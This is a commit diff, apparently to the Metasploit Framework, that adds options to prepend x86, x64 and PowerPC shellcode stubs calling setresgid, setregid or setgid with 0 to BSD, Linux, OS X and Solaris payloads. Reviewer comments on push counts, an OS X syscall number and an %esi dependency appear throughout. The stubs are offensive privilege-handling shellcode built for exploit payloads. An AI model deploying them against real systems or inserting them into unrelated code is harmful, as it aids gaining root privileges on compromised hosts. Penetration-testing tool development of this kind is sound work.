add PrependSet[re]gid support for unix payloads

commit 90b948ffb31d83434bf82a40a1dd3276f9431cc0 1 parent 9a0a063
m m authored
50 lib/msf/core/payload/bsd.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetresgid',
+ [
+ false,
+ "Prepend a stub that executes the setresgid(0, 0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('AppendExit',
[
false,
@@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x66\xb8\x38\x01" +# movw $0x0138,%ax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x7f" +# movb $0x7f,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\xb5" +# movb $0xb5,%al #
+ "\xcd\x80" # int $0x80 #
+ end
# Append
if (datastore['AppendExit'])
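Review bot: The push counts in the three new x86 stubs are one more than the argument count (four pushl for the three-argument setresgid, three for setregid, two for setgid) and nothing says why; as I read it the extra slot is the dummy return address the BSD int $0x80 convention expects, which a reader comparing these against the Linux stubs would otherwise take for a bug. A comment on the first pushl of each stub would settle it, e.g. `"\x50" +# pushl %eax (dummy return-address slot for int $0x80) #`. It is also worth stating in the option descriptions that the Prepend* options are cumulative: every enabled stub is emitted in the order it appears here, and nothing rejects PrependSetresgid together with PrependSetgid, so a user enabling several gets several syscalls. The generate body continues outside the hunk.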
104 lib/msf/core/payload/linux.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetresgid',
+ [
+ false,
+ "Prepend a stub that executes the setresgid(0, 0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('PrependChrootBreak',
[
false,
@@ -102,6 +123,31 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x31\xc9" +# xorl %ecx,%ecx #
+ "\x31\xdb" +# xorl %ebx,%ebx #
+ "\xf7\xe3" +# mull %ebx #
+ "\xb0\xaa" +# movb $0xaa,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc9" +# xorl %ecx,%ecx #
+ "\x31\xdb" +# xorl %ebx,%ebx #
+ "\x6a\x47" +# pushl $0x47 #
+ "\x58" +# popl %eax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xdb" +# xorl %ebx,%ebx #
+ "\x6a\x2e" +# pushl $0x2e #
+ "\x58" +# popl %eax #
+ "\xcd\x80" # int $0x80 #
+ end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
@@ -185,6 +231,33 @@ def generate(*args)
"\x44\xff\xff\x02" # sc #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x3b\xe0\x01\xff" +# li r31,511 #
+ "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
+ "\x7c\x84\x22\x78" +# xor r4,r4,r4 #
+ "\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
+ "\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
+ "\x44\xff\xff\x02" # sc #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x3b\xe0\x01\xff" +# li r31,511 #
+ "\x7c\x84\x22\x78" +# xor r4,r4,r4 #
+ "\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
+ "\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
+ "\x44\xff\xff\x02" # sc #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x3b\xe0\x01\xff" +# li r31,511 #
+ "\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
+ "\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
+ "\x44\xff\xff\x02" # sc #
+ end
+
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
@@ -235,6 +308,33 @@ def generate(*args)
pre << "\x0f\x05" # syscall #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x48\x89\xfe" # mov rsi,rdi #
+ pre << "\x6a\x77" # push 0x77 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x48\x89\xfe" # mov rsi,rdi #
+ pre << "\x48\x89\xf2" # mov rdx,rsi #
+ pre << "\x6a\x72" # push 0x72 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x6a\x6a" # push 0x6a #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
+
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
@@ -269,7 +369,7 @@ def generate(*args)
pre << "\x48\x89\xe7" # mov rdi,rsp #
# loop chdir(..) 69 times
- # syscall tendo to modify rcx can't use loop...
+ # syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
@@ -278,7 +378,7 @@ def generate(*args)
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #
- # chrot (.) (witch should by /)
+ # chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #
50 lib/msf/core/payload/osx.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetresgid',
+ [
+ false,
+ "Prepend a stub that executes the setresgid(0, 0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('AppendExit',
[
false,
@@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x66\xb8\x38\x01" +# movw $0x0138,%ax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x7f" +# movb $0x7f,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\xb5" +# movb $0xb5,%al #
+ "\xcd\x80" # int $0x80 #
+ end
# Append
if (datastore['AppendExit'])
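Review bot: The OS X setresgid stub is byte-for-byte the FreeBSD one (syscall 0x138 via `movw $0x0138,%ax`), and I am not aware of a setresgid(2) in the macOS/XNU syscall table — as far as I recall that slot is unimplemented there — so on OS X this option would at best return ENOSYS and leave the gid untouched. Before exposing PrependSetresgid for osx, check the number against XNU's syscalls.master; if there is no such call, drop the option from osx.rb or say in its description that it is a no-op on OS X. The setregid (0x7f) and setgid (0xb5) numbers are, as far as I know, shared by both BSD-derived kernels, so those two look fine. The generate body continues outside the hunk.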
30 lib/msf/core/payload/solaris.rb
@@ -33,6 +33,20 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('AppendExit',
[
false,
@@ -86,6 +100,22 @@ def generate(*args)
"\xff\xd6" # call *%esi #
end
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\xcb" +# movb $0xcb,%al #
+ "\xff\xd6" # call *%esi #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x2e" +# movb $0x2e,%al #
+ "\xff\xd6" # call *%esi #
+ end
# Append
if (datastore['AppendExit'])
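Review bot: Both new stubs dispatch through `call *%esi`, as does the stub ending just above them, so they only work once earlier prepend code has loaded the syscall trap address into %esi — that setup is outside this hunk, and a reader of these blocks alone cannot tell where %esi comes from. A one-line comment on each stub, `# %esi holds the syscall trap address loaded by the preceding stub`, would make the dependency explicit, and it is worth confirming that the %esi setup is emitted unconditionally rather than only under another Prepend* option, since otherwise enabling PrependSetgid alone would call through an uninitialised register. Solaris gets no PrependSetresgid here, presumably because the platform has no setresgid(2); a short note saying so would stop someone adding it later by copying from bsd.rb. The generate body continues outside the hunk.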